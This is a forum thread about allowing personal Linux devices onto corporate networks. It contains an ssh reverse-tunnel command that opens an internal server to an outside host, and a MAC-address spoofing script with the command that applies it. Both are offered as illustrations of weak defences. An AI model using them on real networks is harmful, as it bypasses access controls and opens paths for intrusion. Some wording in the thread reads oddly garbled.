iball's Avatar
Posts: 729 | Thanked: 19 times | Joined on Mar 2007
#21
Originally Posted by Hedgecore View Post
I'm running Ubuntu at home and I can't tell you whether I do or not.
Then you need to get the phuck out of the IT industry.
It's people like you who "run things" and have no idea what they're doing who are destroying the will to live of those of us who do know what we're doing.
In other words, that one sentence you wrote nullifies your entire argument and makes you look like a clueless *****.

Where I work we're all about open source and Linux and the president of the company has told us "you're network engineers, you know what's safe and what isn't. If I can't trust you, then this whole thing falls apart."
But hey, I guess anyone complaining that they can't bring an IT into the workplace doesn't have a really important job there.
__________________
Kicking Nokia in the jimmy, one marketing exec at a time.
Originally Posted by Mr. T
Well maybe Mr. T hacked the game, and made a mohawk class? And maybe Mr. T is pretty handy with computers? Had that occurred to you, Mr. Condescending Director?

Last edited by iball; 2007-12-08 at 14:16.
 
Hedgecore's Avatar
Posts: 1,361 | Thanked: 115 times | Joined on Oct 2005 @ Toronto, Ontario, Canada
#22
WOW. I've been trying to lay back and have an exploratory conversation but I'm done with that.

I will not, and have never, written a 30-page diatribe to cover every possible angle and qualify the things I've said.

If you think you can sit back and tell me your Linux box is 100% secure, and you're sure of that, then you're deluded, unless you just installed it and it's never achieved connectivity. That's the fun part about security breaches: they're usually not evident the second they happen. I think that attitude means I *should* stay in IT (it seems you're not considering that IT goes beyond site support and development). The last person I would want to work with is some overconfident egomaniac with a smug look on his face.

You're making a lot of assumptions that I sit back and "run things", but I don't. I've done a lot of server-side/infrastructure work (both admin and development), and I'm not enough of a jerk to think my work is the be-all and end-all. So far as I know, my Ubuntu box is clean. So far as I know, someone in a cabin in Russia hasn't come out with anything I've never seen or heard about before. That makes me realistic, not clueless.

My IT regularly comes with me into the workplace. It only connects to the WiFi provided for clients, which is solely an internet connection and has nothing to do with our network.

And Jerome... obviously I can form somewhat coherent sentences; shouldn't that immediately qualify me to know the obvious, that security goes beyond malware/viruses? CC-related call centers operate as clean rooms (no paper, pens, recorders, etc.), and there are a host of other physical security concerns. Machines are locked down with strict policies through AD to prevent agents from running anything that could conceivably help them scoop numbers/info. I'm not getting into all the details, but jeez... and NO, that machine wasn't the only repository of vital data, but it was a COPY, one which *I* wouldn't feel comfortable having walk out the door with a now non-employee. When you quit your manager's job at McDonald's, do they let you keep a copy of the key to the safe?

And to the snotty developers getting their knickers in a knot (as I've said, I *DO* development work; most people I work with I like, but a lot drive me bat-sh*t crazy with their poor practices): you don't even have to post these back, but think about them. Which apply to you?

1.) I resent the fact my work has to go to QA, I checked it myself.
2.) I argue a lot with QA
3.) When I get specs I try to improve them and sometimes that takes longer than the project initially allotted.
4.) I'm awesome, the organization couldn't survive without me.
5.) This is the only thing I'm good at, I suck in social situations, and I get my neck beard in a knot when people try to stymie my brilliant ideas. I know assembler you f*ck!!!

You can change the wording around if you like, as long as you don't change the gist of the question. (Some developers I know haven't yet achieved the ability to grow facial hair on their necks.)

(P.S. I develop. I'm not site support. If you're going to make sweeping assumptions about me, let's at least get it in the right ballpark.)

Hugs & Kisses,
Hedge
 
Posts: 3,841 | Thanked: 1,079 times | Joined on Nov 2006
#23
Originally Posted by TA-t3
The best thing is probably to not allow anything (including USB sticks, flash cards and iPods) inside the corporate system.
Originally Posted by sevo View Post
What with every cheap cellphone double-acting as a media player, and every clerk sharing yesterday's YouTube finds, complete with every attached virus, with all friends at work, there are few chances left to enforce that. You won't separate the generations below 40 from their cellphones short of stripping them of all their clothes and belongings, walking them nude through a shower, and refitting them with a company uniform.
Oh, I never said it was _practical_. The best thing, security-wise, is to not allow anything in. In real life, though, it's a compromise (depending on the place; there _are_ places where "nothing should be allowed in, period"). We don't disallow these gadgets where I work, for example. But then the engineers are highly qualified and, more important, there aren't many Windows boxes to be found. And of course the wi-fi is outside the corporate firewall.
__________________
N800/OS2007|N900/Maemo5
-- Metalayer-crawler delenda est.
-- Current state: Fed up with everything MeeGo.
 
Posts: 477 | Thanked: 118 times | Joined on Dec 2005 @ Munich, Germany
#24
Originally Posted by Hedgecore View Post
And Jerome... obviously I can form somewhat coherent sentences; shouldn't that immediately qualify me to know the obvious, that security goes beyond malware/viruses? CC-related call centers operate as clean rooms (no paper, pens, recorders, etc.), and there are a host of other physical security concerns. Machines are locked down with strict policies through AD to prevent agents from running anything that could conceivably help them scoop numbers/info. I'm not getting into all the details, but jeez... and NO, that machine wasn't the only repository of vital data, but it was a COPY, one which *I* wouldn't feel comfortable having walk out the door with a now non-employee. When you quit your manager's job at McDonald's, do they let you keep a copy of the key to the safe?
I am not entirely sure I understand you. If it is operated as a clean room and people can't bring in a pen, how are they going to sneak in a laptop? Really, you confuse me. An environment where one cannot connect anything to the network without first submitting to a full body search is completely different from one where people can bring in a laptop full of viruses.

All I am saying is: if people can bring in a Nokia to connect to the network, the environment is such that people connecting their home laptop full of viruses (or their Linux laptop with a port scanner...) is a definite possibility. In that case, something really sensitive (e.g. credit card numbers) should not be accessible from that network. So your horror scenario implies gross incompetence on the part of the IT department, and as a consequence I think your horror scenario is not real.

And no: I never had a manager job at McDonald's.
 
Hedgecore's Avatar
Posts: 1,361 | Thanked: 115 times | Joined on Oct 2005 @ Toronto, Ontario, Canada
#25
I didn't mean to imply you did. The "you" in "you have to give your key back" wasn't "you" specifically.

In my scenario there are many sites; the clean-room approach is call-center specific and doesn't apply to corporate or any of the support sites. I brought up the clean room and physical security because, in the midst of getting attacked by neckbeards, it was implied that keeping rogue machines off the network was step one of one in securing it.

I wouldn't call it a nightmare scenario at all. All I was trying to say (in the spirit of the original post) was that in my line of business (BPO), introducing any potential unknowns isn't acceptable to the clients, so we just can't do it. There are contractual fines for all sorts of stupid things and, being accountable, it ain't worth it. We've even seen the effects of it: the last worm got in because someone in facilities brought in a laptop and plugged 'er in. That was not incompetence by the IT department (it was a brand-new worm that wasn't known yet); as Linuxrebel said, it was a problem with people. I was happy that it was just ignorant (I don't use that word in a bad sense) users rather than a developer with a sense of entitlement.
 
Posts: 316 | Thanked: 150 times | Joined on May 2006
#26
Originally Posted by djs_tx View Post
It really boils down to platform, doesn't it? AFAIK, there's never been a cross-platform virus, and there's only been one self-replicating Linux virus in the wild.
You are, of course, talking of worms, not viruses. Viruses aren't very common nowadays compared to worms, and their potential threat on a Windows box is only so great because of the common practice of running with full admin rights all the time.

The first well-known worm, however, was multi-platform (UNIX on DEC VAX boxes and Sun workstations) and did more damage to the Internet (at the time, 1988) than Blaster, Slammer, or any other modern pathogen.

The reason IT security is so paranoid is that, thanks to Windows' success, there is not enough diversity in the platform gene pool.
The reason security is so paranoid is that a level of paranoia is healthy and helps you attempt to stay one step ahead of the guys who are out to get you. The Windows monoculture just makes us all weaker, not more paranoid.

Originally Posted by TA-t3 View Post
The best thing is probably to not allow anything (including USB sticks, flash cards and iPods) inside the corporate system.
Exactly right, but just because something is running Linux doesn't make it any more trustworthy: your IT department still does not know what is running on there. There are much more powerful tools installed by default on a Linux box (things like perl, ssh, etc.), which make it much easier to write custom software that uses the new machine as a conduit into the corporate network, and that custom code will sail through any signature-based analysis (AV, malware checks).
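To illustrate how little "custom software" is actually needed: a single stock OpenSSH invocation can turn an unmanaged box into a conduit, and there is no signature for it. A sketch, with all hostnames and the account name being hypothetical:

```shell
# Run from a rogue box INSIDE the corporate network.
# Publishes an internal server's SSH port on an outside machine:
# anyone who can reach outside-box.example.com:2222 now reaches
# internal-server.corp:22 from the comfort of home.
ssh -N -R 2222:internal-server.corp:22 user@outside-box.example.com
```

Nothing here is malware; it's the same ssh binary every admin uses daily, which is exactly why signature-based checks won't catch it.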

Originally Posted by sondjata View Post
our wireless is locked down pretty tight here now and any iPhone, N8xx, has to give up the MAC Address before it is even allowed on the Network.
Sniffing and spoofing MAC addresses is extremely easy and quick. MAC filtering is a level of protection that will serve you for seconds. You may as well not do it. In fact, you'd be better off monitoring and alerting on unauthorised MACs. That way you have a way of knowing a rogue device is attempting to connect to the network.
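For the skeptics: generating a plausible spoof address takes a few lines in any language, and applying it is one command. A minimal sketch (the `wlan0` interface name in the comment is an assumption; any sniffed, authorised MAC would work just as well as a random one):

```python
import random

def random_laa_mac() -> str:
    """Generate a random locally-administered, unicast MAC address.

    In the first octet, the low bit must be 0 (unicast) and the
    next bit 1 (locally administered), e.g. 0x02.
    """
    first = (random.randrange(256) & 0b11111100) | 0b00000010
    rest = [random.randrange(256) for _ in range(5)]
    return ":".join(f"{b:02x}" for b in [first] + rest)

mac = random_laa_mac()
print(mac)
# Applying it on Linux is then a one-liner (needs root; interface assumed):
#   ip link set dev wlan0 address <mac>
```

Which is why a MAC filter buys you seconds, not security.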

Originally Posted by sevo View Post
What with every cheap cellphone double-acting as a media player, and every clerk sharing yesterday's YouTube finds, complete with every attached virus, with all friends at work, there are few chances left to enforce that.
On a properly managed network there is. There are plenty of packages around that can selectively disable USB (and other) ports based on a centralised policy. You have a business reason for using that USB key? OK, you can use it but only that one, the software will block any other one.
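And even without a third-party package, newer Linux kernels expose a per-device USB authorization knob that a central policy script could drive. A rough sketch (device paths are hypothetical and vary per machine; needs root):

```shell
# Refuse new USB devices by default on bus usb1 (path varies per host):
echo 0 > /sys/bus/usb/devices/usb1/authorized_default
# After inspecting one specific device (here hypothetically "1-2"),
# authorize just that one:
echo 1 > /sys/bus/usb/devices/1-2/authorized
```

The commercial packages mostly wrap this kind of mechanism in a centralised policy with device whitelists.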
 
Posts: 3,841 | Thanked: 1,079 times | Joined on Nov 2006
#27
[1988] You're talking about the 'finger' worm, right? I remember that the manager in charge of the network at the single point of connection to the Atlantic cable literally pulled the plug when he was notified about the worm, thereby stopping it before it arrived, and also disconnecting a whole country (or possibly several countries; my memory gets fuzzy) from major parts of the internet.

Anyway, what's interesting about that worm is that it could spread only because of the homogeneity of Unix systems at that time: they all (or nearly all) used the exact same code base for the part the finger worm penetrated. Today the same trick wouldn't work, or at least not with the exponential speed that shocked even the worm's author. Uniformity... the same operating system and applications installed on the vast majority of computers... does that remind you of something?
__________________
N800/OS2007|N900/Maemo5
-- Metalayer-crawler delenda est.
-- Current state: Fed up with everything MeeGo.
 
Posts: 316 | Thanked: 150 times | Joined on May 2006
#28
I was talking about the 'Morris' worm. It had (at least) three methods of propagation: the finger hole, a hole in sendmail, and brute-force login attempts. It attacked two quite different UNIX flavours with different hardware architectures.
I would be the last person to say that a monoculture is a good thing. I was just pointing out the fallacy in believing that a cross-platform worm is impossible. I will go so far as to state that while a monoculture does not increase the risk of a successful attack, it makes the ramifications of such an attack an order of magnitude more severe.
 
Posts: 227 | Thanked: 51 times | Joined on Feb 2006
#29
Boy has this thread gotten a little hostile...

Cross platform: I agree. Not impossible but uncommon enough that worrying about it is way down the priority list.

People are the problem. You can engineer a great security system, and if some employee wants to cause problems, he'll find a way. If you lock down the network so tight that it is very, very hard for anyone to do anything bad, then you have created a network environment that is "hostile" for those of us who know what the hell we are doing and want to innovate and do our jobs.

I respect IT, they have a tough job. But I'm laying the groundwork right now to quit and start my own consulting business because I am sick and tired of fighting people in my own company to get the resources to do my job.

IT is so paranoid that they can't see the forest for the trees. My job title is "senior software engineer" for a NASA contractor, but they actually made me fight to get admin rights on my boxes. When Symantec blocked downloading netcat for some testing, I asked IT to change the virus-scanner settings on my box. They said no, netcat can be used for hacking. I explained to them that I was not trying to hack their network, just do my job, but they refused. I even pointed them to a Symantec web page that recommends netcat as a troubleshooting tool. No joy.

So it has turned into a hostile relationship. I ignore their rules and get my job done. My boss knows everything I do and how I do it. If they want to fire me, that's fine by me. But because I ignore their crippling rules, I get a lot done and contribute too much to the project to be fired. To be clear, I'm not doing anything that will compromise their network, and I am not dealing with sensitive data. If I screw anything up, I'll pay the price and get all my privileges yanked.

But from what I hear, IT is a PITA for everyone. So hopefully in late 2008, I'm taking my act solo and working for the highest bidders.

David
__________________
David Smoot
 
Posts: 245 | Thanked: 25 times | Joined on Apr 2007
#30
Really, what a lot of this comes down to (as always) is convenience and ease of use vs. security. You can make a very secure, locked-down system, and it will work well for things like data entry/web/etc. If you need to do things beyond that, you generally need to relax some rules or remove policies (again, I'm speaking VERY generally here), such as adding Visual Studio users to a "Debug" group that has SOME administrator privileges. At my previous university, all USB ports were disabled in the BIOS of the machines in a certain lab because a large, costly database lived on a server, and the licensing terms prohibited anything that could be used to copy off that database. The result was a revolt by graduate students that eventually led to the company changing the licensing terms to allow signed affidavits that we would not copy their data. The loss of usability in this case outweighed the added "security" for the data, and caused a lot of work for the IT folks and legal types in re-negotiating the contract. Again, as always, there is no perfect trade-off between ease of use and security.

I work in a university environment that is reasonably secure. All users must authenticate against Active Directory to get access to network resources, public jacks are protected via 802.1x, and private (office) jacks are somewhat protected against things like MAC flooding. The wireless network is secured by WPA2 and a Radius server which authenticates with the AD controller. Windows and Mac client machines must use the site-licensed antivirus, a VPN is in place to connect from home, all outgoing connections are NATed, traffic shaping reduces the burden of file sharing, and strong passwords are enforced along with changes every 60 days, etc. Linux is not an officially sanctioned OS, but I know that I, among others, use it daily in both workstation and server roles, with IT approval for the servers. Thus, I'd classify it as a pretty secure network, certainly on par with some corporate networks, but not as secure as a certain local very large company that I hear about from students. This makes sense, as most of our data is about students, and is protected by Federal privacy laws. It would certainly be bad for it to leak, but it would not cause the end of existence for the university.

How do I know my Linux machine (not N800) is secure? Two reasons:
1. I only run SSH as a service, and have passwords that are secure as defined by the local AD server, and changed every 60 days. The fact that no other servers are running automatically lowers the number of exploits that can be used, but doesn't eliminate all threats. Being behind a NAT firewall also means that the only people that could be hacking against my machine are on-campus, and I know for certain that port-scanning detection is in place on the network, and Ethernet jacks that exhibit the signs of running a port scan are shut down immediately.
2. I run a rootkit checker every week as a cron job and email the report to myself. Could something get by? Yes, but I feel I'm exercising due diligence in protecting the machine and the network by doing so.
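The cron side of point 2 looks something like this; the tool path and mail address here are stand-ins, not my actual setup, and it assumes chkrootkit and a working local mailer:

```shell
# Hypothetical /etc/cron.d/rkcheck entry: run chkrootkit every Sunday
# at 03:00 and mail the report to yourself for review.
0 3 * * 0  root  /usr/sbin/chkrootkit 2>&1 | mail -s "weekly rootkit report" me@example.edu
```

Reading the report every week matters as much as generating it; a mailed report nobody opens is no diligence at all.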

So, to return to the original poster's question, "Is my N800 secure? Should it be allowed onto the campus network?" Well, the answer is obviously different than in some corporate settings, for the reasons outlined above, but it is "If it can meet the same requirements as other devices allowed on the network, then yes." That means, if IT doesn't allow personal laptops or PDAs to connect to local resources, this device would be included. If policy prohibits card readers, this device would also be included. In my case, the device can support the wireless connection security the same as any student laptop, so there's no reason not to allow it on the network. Could it have malware? Yes. Could that malware potentially damage the network, attached devices, or data? Yes. Could a student or faculty laptop have the same effect? Yes. That's why so many protections are on the network: to allow a (for a university) reasonable trade-off between security and ease of use.
 